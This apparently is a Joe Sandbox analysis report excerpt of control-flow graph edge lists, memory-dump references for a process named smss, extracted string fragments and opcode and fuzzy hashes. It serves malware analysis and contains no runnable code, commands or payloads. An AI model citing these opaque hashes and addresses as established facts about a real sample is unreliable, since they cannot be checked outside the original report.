                                                                                        • API String ID:
                                                                                        • Opcode ID: abd8b9937d08a802ee6b6eff0344a8d016017a091416bf6c0cc4307a3ae332e5
                                                                                        • Instruction ID: ef47beb1d5cbaece63ecbf53a4e78545f30e9cd72296265b9382ccb6399160cb
                                                                                        • Opcode Fuzzy Hash: abd8b9937d08a802ee6b6eff0344a8d016017a091416bf6c0cc4307a3ae332e5
                                                                                        • Instruction Fuzzy Hash: 57A1338588E3C16FD31347745C756A6BFB0AE53214B1E86EBC0C1CB4E3E609699AC363

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 711 7ff887d70d78-7ff887d70f97 call 7ff887d707f0 738 7ff887d70f9f-7ff887d71020 711->738
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "9B$b4B$r6B$r6B
                                                                                        • API String ID: 0-1939837083
                                                                                        • Opcode ID: 555571b5eb4f36eea492436b2451db1612e5413ef8d2ad11b98e649703660130
                                                                                        • Instruction ID: febae67f6166cb1766aaf286723bc8b1b0fb7767d7a0ca20e00c8741b9266b4a
                                                                                        • Opcode Fuzzy Hash: 555571b5eb4f36eea492436b2451db1612e5413ef8d2ad11b98e649703660130
                                                                                        • Instruction Fuzzy Hash: ED71CF71918A9D8FE789DB68C8283AD7FF1FBA6754F4002AAC04AD72D6DE781815C701

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 740 7ff88815f062-7ff88815f069 741 7ff88815f06f-7ff88815f0a1 call 7ff88815ee00 call 7ff88815ecd0 740->741 742 7ff88815f285-7ff88815f296 740->742 741->742 749 7ff88815f0a7-7ff88815f0f9 call 7ff88815ee00 call 7ff88815ecd0 741->749 743 7ff88815f29d-7ff88815f2a8 742->743 744 7ff88815f298 742->744 744->743 749->742 755 7ff88815f0ff-7ff88815f144 call 7ff88815ee00 749->755 761 7ff88815f1b4-7ff88815f1f0 755->761 762 7ff88815f146-7ff88815f15a call 7ff88815ecd0 755->762 771 7ff88815f229-7ff88815f22e 761->771 762->742 767 7ff88815f160-7ff88815f183 call 7ff88815ee00 762->767 772 7ff88815f189-7ff88815f199 767->772 773 7ff88815f355-7ff88815f36c 767->773 776 7ff88815f235-7ff88815f23a 771->776 772->773 774 7ff88815f19f-7ff88815f1b2 772->774 777 7ff88815f36f-7ff88815f37d 773->777 778 7ff88815f36e 773->778 774->761 774->762 779 7ff88815f23c-7ff88815f23e 776->779 780 7ff88815f1f2-7ff88815f212 776->780 782 7ff88815f37f 777->782 783 7ff88815f385 777->783 778->777 779->742 784 7ff88815f240-7ff88815f243 779->784 780->773 781 7ff88815f218-7ff88815f223 780->781 781->771 785 7ff88815f30b-7ff88815f31f 781->785 782->783 786 7ff88815f389-7ff88815f3c8 783->786 787 7ff88815f387 783->787 788 7ff88815f249-7ff88815f264 784->788 789 7ff88815f245 784->789 792 7ff88815f326-7ff88815f331 785->792 793 7ff88815f321 785->793 790 7ff88815f3c9 786->790 795 7ff88815f3ca-7ff88815f60a 786->795 787->786 787->790 788->773 794 7ff88815f26a-7ff88815f283 call 7ff88815ecd0 788->794 789->788 790->795 793->792 794->742 798 7ff88815f2a9-7ff88815f2c2 call 7ff88815ee00 794->798 798->773 803 7ff88815f2c8-7ff88815f2cf 798->803 804 7ff88815f2f9-7ff88815f301 803->804 805 7ff88815f2d1-7ff88815f2ed 804->805 806 7ff88815f303-7ff88815f309 804->806 805->773 807 7ff88815f2ef-7ff88815f2f7 805->807 806->785 808 7ff88815f332 806->808 807->804 808->773
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B$r6B$r6B
                                                                                        • API String ID: 0-1049672097
                                                                                        • Opcode ID: 725a8bfb5976f5f0a644c07ec9332bd74179e388160e5bd55507daf53cc146aa
                                                                                        • Instruction ID: db6a784bd2e3436b91a1228a7053e314007b8a3b87b2070b2c5f20690718f8cb
                                                                                        • Opcode Fuzzy Hash: 725a8bfb5976f5f0a644c07ec9332bd74179e388160e5bd55507daf53cc146aa
                                                                                        • Instruction Fuzzy Hash: 21C1C274A28A468FE789DB28C0956A4BBE1FF58350F444279C44EC7A86DF28F851CB85

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 809 7ff88816da62-7ff88816da69 810 7ff88816da6f-7ff88816daa1 call 7ff88816d800 call 7ff88816d6d0 809->810 811 7ff88816dc85-7ff88816dc96 809->811 810->811 818 7ff88816daa7-7ff88816daf9 call 7ff88816d800 call 7ff88816d6d0 810->818 812 7ff88816dc9d-7ff88816dca8 811->812 813 7ff88816dc98 811->813 813->812 818->811 824 7ff88816daff-7ff88816db44 call 7ff88816d800 818->824 830 7ff88816db46-7ff88816db5a call 7ff88816d6d0 824->830 831 7ff88816dbb4-7ff88816dbf0 824->831 830->811 836 7ff88816db60-7ff88816db83 call 7ff88816d800 830->836 840 7ff88816dc29-7ff88816dc2e 831->840 841 7ff88816db89-7ff88816db99 836->841 842 7ff88816dd55-7ff88816dd6c 836->842 845 7ff88816dc35-7ff88816dc3a 840->845 841->842 843 7ff88816db9f-7ff88816dbb2 841->843 846 7ff88816dd6e 842->846 847 7ff88816dd6f-7ff88816dd7d 842->847 843->830 843->831 848 7ff88816dc3c-7ff88816dc3e 845->848 849 7ff88816dbf2-7ff88816dc12 845->849 846->847 851 7ff88816dd7f 847->851 852 7ff88816dd85 847->852 848->811 853 7ff88816dc40-7ff88816dc43 848->853 849->842 850 7ff88816dc18-7ff88816dc23 849->850 850->840 854 7ff88816dd0b-7ff88816dd1f 850->854 851->852 855 7ff88816dd89-7ff88816ddc8 852->855 856 7ff88816dd87 852->856 857 7ff88816dc49-7ff88816dc64 853->857 858 7ff88816dc45 853->858 861 7ff88816dd26-7ff88816dd31 854->861 862 7ff88816dd21 854->862 859 7ff88816ddc9 855->859 860 7ff88816ddca-7ff88816e00a 855->860 856->855 856->859 857->842 863 7ff88816dc6a-7ff88816dc83 call 7ff88816d6d0 857->863 858->857 859->860 862->861 863->811 867 7ff88816dca9-7ff88816dcc2 call 7ff88816d800 863->867 867->842 871 7ff88816dcc8-7ff88816dccf 867->871 872 7ff88816dcf9-7ff88816dd01 871->872 873 7ff88816dd03-7ff88816dd09 872->873 874 7ff88816dcd1-7ff88816dced 872->874 873->854 876 7ff88816dd32 873->876 874->842 875 7ff88816dcef-7ff88816dcf7 874->875 875->872 876->842
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B$r6B$r6B
                                                                                        • API String ID: 0-1049672097
                                                                                        • Opcode ID: 7689b26e6be676367f8927378d0a6ea45e27156115bf9ea5c7a0660315c6a5b5
                                                                                        • Instruction ID: eab3b95f3bf37f635a00c6845de6883847322afec8300f1d3d5987b5ac75ac5b
                                                                                        • Opcode Fuzzy Hash: 7689b26e6be676367f8927378d0a6ea45e27156115bf9ea5c7a0660315c6a5b5
                                                                                        • Instruction Fuzzy Hash: ADC1A134A1CA469FE74ADB28C0916B4BBA1FF45340F4441B9C48EC7A87CF69B851CB85

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 947 7ff888168192-7ff888168199 948 7ff88816819f-7ff8881681d1 call 7ff888167f30 call 7ff888167e00 947->948 949 7ff8881683b5-7ff8881683c6 947->949 948->949 956 7ff8881681d7-7ff888168229 call 7ff888167f30 call 7ff888167e00 948->956 950 7ff8881683cd-7ff8881683d8 949->950 951 7ff8881683c8 949->951 951->950 956->949 962 7ff88816822f-7ff888168274 call 7ff888167f30 956->962 968 7ff888168276-7ff88816828a call 7ff888167e00 962->968 969 7ff8881682e4-7ff888168320 962->969 968->949 973 7ff888168290-7ff8881682b3 call 7ff888167f30 968->973 980 7ff888168359-7ff88816835e 969->980 978 7ff8881682b9-7ff8881682c9 973->978 979 7ff888168485-7ff88816849c 973->979 978->979 981 7ff8881682cf-7ff8881682e2 978->981 986 7ff88816849e 979->986 987 7ff88816849f-7ff8881684ad 979->987 982 7ff888168365-7ff88816836a 980->982 981->968 981->969 984 7ff88816836c-7ff88816836e 982->984 985 7ff888168322-7ff888168342 982->985 984->949 988 7ff888168370-7ff888168373 984->988 985->979 989 7ff888168348-7ff888168353 985->989 986->987 990 7ff8881684af 987->990 991 7ff8881684b5 987->991 994 7ff888168379-7ff888168394 988->994 995 7ff888168375 988->995 989->980 996 7ff88816843b-7ff88816844f 989->996 990->991 992 7ff8881684b9-7ff8881684f8 991->992 993 7ff8881684b7 991->993 997 7ff8881684f9 992->997 1002 7ff8881684fa-7ff88816873a 992->1002 993->992 993->997 994->979 999 7ff88816839a-7ff8881683b3 call 7ff888167e00 994->999 995->994 1000 7ff888168456-7ff888168461 996->1000 1001 7ff888168451 996->1001 997->1002 999->949 1006 7ff8881683d9-7ff8881683f2 call 7ff888167f30 999->1006 1001->1000 1006->979 1010 7ff8881683f8-7ff8881683ff 1006->1010 1011 7ff888168429-7ff888168431 1010->1011 1012 7ff888168433-7ff888168439 1011->1012 1013 7ff888168401-7ff88816841d 1011->1013 1012->996 1015 7ff888168462 1012->1015 1013->979 1014 7ff88816841f-7ff888168427 1013->1014 1014->1011 1015->979
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B$r6B$r6B
                                                                                        • API String ID: 0-1049672097
                                                                                        • Opcode ID: 02944cb5551c6583e8d69ae8ad852efb3befae160e543209cdb5df7e06ff3d97
                                                                                        • Instruction ID: 944fba79a98dfea68c6d779edf1b89615ed950d524d6c8173c3f736ebe84a8e4
                                                                                        • Opcode Fuzzy Hash: 02944cb5551c6583e8d69ae8ad852efb3befae160e543209cdb5df7e06ff3d97
                                                                                        • Instruction Fuzzy Hash: D6C1C07491CA468FE75ADF28C0916B4BBA1FF59340F4441B9C48EC7A86EF28F851CB85

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1016 7ff887d991e1-7ff887d99229 1018 7ff887d992c2-7ff887d992c9 1016->1018 1019 7ff887d9922f-7ff887d99268 1016->1019 1021 7ff887d99351-7ff887d99366 1018->1021 1022 7ff887d992cf-7ff887d992d6 1018->1022 1019->1018 1024 7ff887d99368 1021->1024 1025 7ff887d9936d-7ff887d9939b 1021->1025 1023 7ff887d992d8-7ff887d99316 1022->1023 1028 7ff887d9931d-7ff887d99345 1023->1028 1024->1025 1033 7ff887d99401-7ff887d9941f 1025->1033 1034 7ff887d9939d-7ff887d993a2 1025->1034 1049 7ff887d9934b 1028->1049 1050 7ff887d994ec-7ff887d99533 1028->1050 1045 7ff887d99421-7ff887d9942d 1033->1045 1046 7ff887d9942e-7ff887d994b7 1033->1046 1035 7ff887d993b3-7ff887d993ba 1034->1035 1036 7ff887d993a4-7ff887d993a9 1034->1036 1039 7ff887d993fb-7ff887d99400 1035->1039 1040 7ff887d993bc-7ff887d993c3 1035->1040 1036->1035 1039->1033 1040->1033 1042 7ff887d993c5-7ff887d993d0 1040->1042 1047 7ff887d993e1-7ff887d993e8 1042->1047 1048 7ff887d993d2-7ff887d993d7 1042->1048 1045->1046 1053 7ff887d994bb-7ff887d994eb call 7ff887d99534 1046->1053 1047->1039 1051 7ff887d993ea-7ff887d993f6 1047->1051 1048->1047 1049->1021 1051->1053
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d91000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: XE$p[D$r6B
                                                                                        • API String ID: 0-863143724
                                                                                        • Opcode ID: 71f5b1770bbbcab5ee044a28b5a40da3bc7dbb5821f1a215f3bbc3dc92c9240d
                                                                                        • Instruction ID: a711e5e6820f4db2c53cd45a50f1c10ba4d22fd70c8364badf1cfa2a7419783b
                                                                                        • Opcode Fuzzy Hash: 71f5b1770bbbcab5ee044a28b5a40da3bc7dbb5821f1a215f3bbc3dc92c9240d
                                                                                        • Instruction Fuzzy Hash: 0091A130A1894A8FEB44EF68C4957BD77E2FFA8354B50027AD40EC7296DF38A842C741

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1113 7ff887d70b3f-7ff887d70b41 1114 7ff887d70b7c-7ff887d70ba0 1113->1114 1115 7ff887d70b43-7ff887d70b65 1113->1115 1116 7ff887d7ddf0-7ff887d7ddf8 1114->1116 1115->1114 1117 7ff887d7ddfe-7ff887d7de03 1116->1117
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: c9$!k9$"s9
                                                                                        • API String ID: 0-3426396564
                                                                                        • Opcode ID: 05915475ce142c3818c916c06dc2329d3cac97bb38c346fb54e39def6396cbbe
                                                                                        • Instruction ID: 4ef9995dbdc341e0d9a23f7c0cbb1f87ccc7630dcc7fc9dba9b71a820a628832
                                                                                        • Opcode Fuzzy Hash: 05915475ce142c3818c916c06dc2329d3cac97bb38c346fb54e39def6396cbbe
                                                                                        • Instruction Fuzzy Hash: F501262772E95E4B8705663DF8405EC7B50EAC7132B9903F7D045C7592E511185BC3D0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1118 7ff888155700-7ff88815571a 1119 7ff888155d1c-7ff888155d40 1118->1119 1120 7ff888155720-7ff888155730 1118->1120 1121 7ff888155d7a-7ff888155d90 1120->1121 1122 7ff888155736-7ff888155771 1120->1122 1126 7ff888155dda-7ff888155ded 1121->1126 1127 7ff888155d92-7ff888155db6 1121->1127 1125 7ff88815580a-7ff888155812 1122->1125 1128 7ff888155818 1125->1128 1129 7ff888155776-7ff88815577f 1125->1129 1131 7ff888155822-7ff88815583f 1128->1131 1129->1121 1130 7ff888155785-7ff888155790 1129->1130 1132 7ff88815581a-7ff88815581e 1130->1132 1133 7ff888155796-7ff8881557aa 1130->1133 1134 7ff888155846-7ff888155857 1131->1134 1132->1131 1135 7ff8881557ac-7ff8881557c3 1133->1135 1136 7ff888155803-7ff888155807 1133->1136 1141 7ff888155859-7ff88815586e 1134->1141 1142 7ff888155870-7ff88815587f 1134->1142 1135->1121 1137 7ff8881557c9-7ff8881557d5 1135->1137 1136->1125 1139 7ff8881557ef-7ff888155800 1137->1139 1140 7ff8881557d7-7ff8881557eb 1137->1140 1139->1136 1140->1135 1143 7ff8881557ed 1140->1143 1141->1142 1147 7ff8881558a1-7ff88815590e 1142->1147 1148 7ff888155881-7ff88815589c 1142->1148 1143->1136 1156 7ff88815595f-7ff888155997 1147->1156 1157 7ff888155910-7ff888155923 1147->1157 1154 7ff888155cd9-7ff888155d0a 1148->1154 1163 7ff888155d0c-7ff888155d16 1154->1163 1165 7ff88815599c-7ff8881559a6 1156->1165 1157->1121 1159 7ff888155929-7ff888155957 1157->1159 1168 7ff888155958-7ff88815595d 1159->1168 1163->1119 1163->1120 1167 7ff8881559aa-7ff8881559b6 1165->1167 1167->1165 1171 7ff8881559b8-7ff8881559cb 1167->1171 1168->1157 1169 7ff88815595e 1168->1169 1169->1156 1172 7ff888155a3c-7ff888155a4d 1171->1172 1173 7ff8881559cd-7ff8881559d1 1171->1173 1174 7ff888155a4e-7ff888155a51 1172->1174 1173->1168 1176 7ff8881559d3 1173->1176 1177 7ff888155a57-7ff888155a5b 1174->1177 1178 7ff8881559fc-7ff888155a0d 1176->1178 1179 7ff888155a5d-7ff888155a5f 1177->1179 1178->1177 1187 7ff888155a0f-7ff888155a1d 1178->1187 1180 7ff888155aa9-7ff888155ab1 1179->1180 1181 7ff888155a61-7ff888155a6f 1179->1181 1185 7ff888155afb-7ff888155b03 1180->1185 1186 7ff888155ab3-7ff888155abc 1180->1186 1183 7ff888155ae0-7ff888155af5 1181->1183 1184 7ff888155a71-7ff888155a75 1181->1184 1183->1185 1184->1178 1197 7ff888155a77 1184->1197 1189 7ff888155b09-7ff888155b22 1185->1189 1190 7ff888155b8b-7ff888155b99 1185->1190 1191 7ff888155abf-7ff888155ac1 1186->1191 1192 7ff888155a8e-7ff888155aa3 1187->1192 1193 7ff888155a1f-7ff888155a23 1187->1193 1189->1190 1198 7ff888155b24-7ff888155b25 1189->1198 1199 7ff888155c0a-7ff888155c0b 1190->1199 1200 7ff888155b9b-7ff888155b9d 1190->1200 1194 7ff888155b32-7ff888155b34 1191->1194 1195 7ff888155ac3-7ff888155ac5 1191->1195 1192->1180 1193->1167 1203 7ff888155a25 1193->1203 1218 7ff888155b35-7ff888155b37 1194->1218 1201 7ff888155ac7 1195->1201 1202 7ff888155b41-7ff888155b45 1195->1202 1197->1192 1205 7ff888155b26-7ff888155b31 1198->1205 1204 7ff888155c3b-7ff888155c3d 1199->1204 1206 7ff888155b9f 1200->1206 1207 7ff888155c19-7ff888155c1b 1200->1207 1201->1174 1209 7ff888155ac9 1201->1209 1210 7ff888155b47 1202->1210 1211 7ff888155bc1-7ff888155bdb 1202->1211 1203->1172 1212 7ff888155cae-7ff888155cd7 1204->1212 1213 7ff888155c3f 1204->1213 1205->1194 1214 7ff888155bad 1205->1214 1206->1205 1215 7ff888155ba1 1206->1215 1216 7ff888155c8c 1207->1216 1217 7ff888155c1d-7ff888155c1f 1207->1217 1222 7ff888155ace-7ff888155ad4 1209->1222 1210->1222 1223 7ff888155b49 1210->1223 1247 7ff888155c0d-7ff888155c16 1211->1247 1248 7ff888155bdd-7ff888155beb 1211->1248 1212->1154 1225 7ff888155c5c-7ff888155c6a 1213->1225 1219 7ff888155c2e 1214->1219 1220 7ff888155bae 1214->1220 1228 7ff888155ba8-7ff888155bac 1215->1228 1226 7ff888155cfd-7ff888155d0a 1216->1226 1227 7ff888155c8e-7ff888155c90 1216->1227 1229 7ff888155c9b-7ff888155c9f 1217->1229 1230 7ff888155c21 1217->1230 1237 7ff888155bb8-7ff888155bc0 1218->1237 1238 7ff888155b38 1218->1238 1239 7ff888155caa-7ff888155cad 1219->1239 1240 7ff888155c30 1219->1240 1220->1218 1231 7ff888155baf-7ff888155bb0 1220->1231 1241 7ff888155b50-7ff888155b75 1222->1241 1246 7ff888155ad6 1222->1246 1223->1241 1242 7ff888155c6b-7ff888155c75 1225->1242 1226->1163 1227->1163 1243 7ff888155c92 1227->1243 1228->1214 1244 7ff888155c28-7ff888155c2c 1228->1244 1232 7ff888155d1b 1229->1232 1233 7ff888155ca1 1229->1233 1230->1228 1236 7ff888155c23 1230->1236 1231->1237 1232->1119 1233->1244 1245 7ff888155ca3 1233->1245 1236->1244 1237->1211 1238->1191 1250 7ff888155b39-7ff888155b3a 1238->1250 1239->1212 1251 7ff888155c77-7ff888155c8a 1240->1251 1252 7ff888155c32-7ff888155c3a 1240->1252 1259 7ff888155b78-7ff888155b89 1241->1259 1242->1251 1243->1207 1254 7ff888155c94 1243->1254 1244->1219 1245->1239 1246->1179 1255 7ff888155ad8 1246->1255 1247->1207 1248->1225 1256 7ff888155bed-7ff888155bef 1248->1256 1250->1202 1251->1216 1252->1204 1254->1229 1255->1183 1256->1242 1258 7ff888155bf1 1256->1258 1258->1259 1261 7ff888155bf3 1258->1261 1259->1190 1259->1198 1261->1199
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0#L$p]L
                                                                                        • API String ID: 0-4069893409
                                                                                        • Opcode ID: 2614bcbd303ec6bd8331c470240781f4a218252abb0f06810b8f3022bd60a3b7
                                                                                        • Instruction ID: 806265feac609e542effd318fd16b071794a9f9a4e9783bde01bd656b899bdc5
                                                                                        • Opcode Fuzzy Hash: 2614bcbd303ec6bd8331c470240781f4a218252abb0f06810b8f3022bd60a3b7
                                                                                        • Instruction Fuzzy Hash: 7132A234A18A198FDB98DF18C899AB87BE2FF54354F5441B9D40EC7292DF28EC45CB84

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1262 7ff8881520f9-7ff8881520fd 1263 7ff8881520ff-7ff888152106 1262->1263 1264 7ff888152107-7ff888152144 1262->1264 1263->1264 1267 7ff88815214a-7ff88815214f 1264->1267 1268 7ff888152461-7ff88815246b 1264->1268 1269 7ff88815215b-7ff888152174 1267->1269 1270 7ff888152151-7ff888152154 1267->1270 1274 7ff88815246c-7ff8881524de 1268->1274 1272 7ff888152188-7ff8881521b5 1269->1272 1273 7ff888152176-7ff888152186 1269->1273 1270->1269 1272->1274 1278 7ff8881521bb-7ff8881521c6 1272->1278 1273->1272 1304 7ff8881524fb-7ff88815250c 1274->1304 1305 7ff8881524e0-7ff8881524e6 1274->1305 1280 7ff8881521cc-7ff8881521da 1278->1280 1281 7ff888152284-7ff888152289 1278->1281 1280->1274 1284 7ff8881521e0-7ff8881521f1 1280->1284 1282 7ff88815231d-7ff888152327 1281->1282 1283 7ff88815228f-7ff888152299 1281->1283 1285 7ff888152349-7ff888152350 1282->1285 1286 7ff888152329 1282->1286 1283->1274 1287 7ff88815229f-7ff8881522b3 1283->1287 1289 7ff888152259-7ff888152270 1284->1289 1290 7ff8881521f3-7ff888152216 1284->1290 1292 7ff888152353-7ff88815235d 1285->1292 1297 7ff88815232e-7ff888152334 1286->1297 1287->1292 1289->1274 1291 7ff888152276-7ff88815227e 1289->1291 1294 7ff88815221c-7ff88815222f 1290->1294 1295 7ff8881522b8-7ff8881522bd 1290->1295 1291->1280 1291->1281 1292->1274 1298 7ff888152363-7ff88815237b 1292->1298 1296 7ff888152233-7ff888152257 1294->1296 1295->1296 1296->1289 1307 7ff8881522c2-7ff8881522c5 1296->1307 1302 7ff88815233b-7ff888152347 1297->1302 1298->1274 1300 7ff888152381-7ff888152399 1298->1300 1300->1274 1303 7ff88815239f-7ff8881523d3 1300->1303 1302->1285 1303->1274 1332 7ff8881523d9-7ff8881523ec 1303->1332 1310 7ff88815251d-7ff888152540 1304->1310 1311 7ff88815250e-7ff88815251b 1304->1311 1308 7ff8881524e8-7ff8881524f9 1305->1308 1309 7ff888152541-7ff8881525f1 1305->1309 1312 7ff8881522db-7ff8881522e8 1307->1312 1313 7ff8881522c7-7ff8881522d7 1307->1313 1308->1304 1308->1305 1311->1310 1312->1274 1318 7ff8881522ee-7ff88815231c 1312->1318 1313->1312 1334 7ff8881523ee-7ff8881523f9 1332->1334 1335 7ff88815244f-7ff888152460 1332->1335 1334->1335 1341 7ff8881523fb-7ff888152445 1334->1341 1341->1335
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888150000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b4B$d
                                                                                        • API String ID: 0-1886680559
                                                                                        • Opcode ID: 62197321fb8b597ecda5376189d8d3e96d5328cf00dc2e74ffd8eafbcc5a4249
                                                                                        • Instruction ID: 6c95b7514b7d541495b73c02b94f6e1c4e5c2e41de1bb7b896dab535de12bb37
                                                                                        • Opcode Fuzzy Hash: 62197321fb8b597ecda5376189d8d3e96d5328cf00dc2e74ffd8eafbcc5a4249
                                                                                        • Instruction Fuzzy Hash: F9020E32A08A468FD788DB28D8856B677E1FF85350F1445B9D49EC7287DE28F843C782

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1347 7ff88815f548-7ff88815f550 1348 7ff88815f558-7ff88815f583 1347->1348 1352 7ff88815f5ac-7ff88815f5b2 1348->1352 1353 7ff88815f5b9-7ff88815f5bf 1352->1353 1354 7ff88815f585-7ff88815f59e 1353->1354 1355 7ff88815f5c1-7ff88815f5c6 1353->1355 1358 7ff88815f695-7ff88815f6a5 1354->1358 1359 7ff88815f5a4-7ff88815f5a9 1354->1359 1356 7ff88815f5cc-7ff88815f601 1355->1356 1357 7ff88815f4b3-7ff88815f4f8 1355->1357 1357->1353 1363 7ff88815f4fe-7ff88815f504 1357->1363 1365 7ff88815f6a8-7ff88815f6f6 1358->1365 1366 7ff88815f6a7 1358->1366 1359->1352 1367 7ff88815f4b5-7ff88815f68d 1363->1367 1368 7ff88815f506 1363->1368 1366->1365 1367->1358 1371 7ff88815f52f-7ff88815f536 1368->1371 1372 7ff88815f508-7ff88815f521 1371->1372 1373 7ff88815f538-7ff88815f543 1371->1373 1372->1358 1376 7ff88815f527-7ff88815f52c 1372->1376 1376->1371
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $r6B
                                                                                        • API String ID: 0-2315467569
                                                                                        • Opcode ID: 11dddc684786502e2f83ead6ca3721e948da853cb1125282ef175968c9b33999
                                                                                        • Instruction ID: 6823ffb49c7a31a1f7c1188703760a8b496dae9c7c56c1bb5c245f2d2b4ff98f
                                                                                        • Opcode Fuzzy Hash: 11dddc684786502e2f83ead6ca3721e948da853cb1125282ef175968c9b33999
                                                                                        • Instruction Fuzzy Hash: BF515734E1850A8FDB58DFA8D4546BDBBB1FF48340F1041BAC01AE7296DF382901CB45

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1411 7ff888168668-7ff888168680 1413 7ff888168688-7ff8881686b3 1411->1413 1417 7ff8881686dc-7ff8881686e2 1413->1417 1418 7ff8881686e9-7ff8881686ef 1417->1418 1419 7ff8881686b5-7ff8881686ce 1418->1419 1420 7ff8881686f1-7ff8881686f6 1418->1420 1423 7ff8881686d4-7ff8881686d9 1419->1423 1424 7ff8881687c5-7ff8881687d5 1419->1424 1421 7ff8881686fc-7ff888168731 1420->1421 1422 7ff8881685e3-7ff888168628 1420->1422 1422->1418 1427 7ff88816862e-7ff888168634 1422->1427 1423->1417 1432 7ff8881687d8-7ff888168826 1424->1432 1433 7ff8881687d7 1424->1433 1429 7ff888168636 1427->1429 1430 7ff8881685e5-7ff8881687bd 1427->1430 1435 7ff88816865f-7ff888168666 1429->1435 1430->1424 1433->1432 1435->1411 1438 7ff888168638-7ff888168651 1435->1438 1438->1424 1440 7ff888168657-7ff88816865c 1438->1440 1440->1435
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $r6B
                                                                                        • API String ID: 0-2315467569
                                                                                        • Opcode ID: a4c2f70ff60f44775d3ae3c11962e2608e1c99a592c19e540718236adc45545c
                                                                                        • Instruction ID: 08abc1f15c7eb28c27c42b07d28b23ce2181445f6c4584c6027719befb6b8f1d
                                                                                        • Opcode Fuzzy Hash: a4c2f70ff60f44775d3ae3c11962e2608e1c99a592c19e540718236adc45545c
                                                                                        • Instruction Fuzzy Hash: 22515C75D0854A8FDB6ADBA8D8646BDBBB1FF54340F1040BAC05AE7286EF382841CB55

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
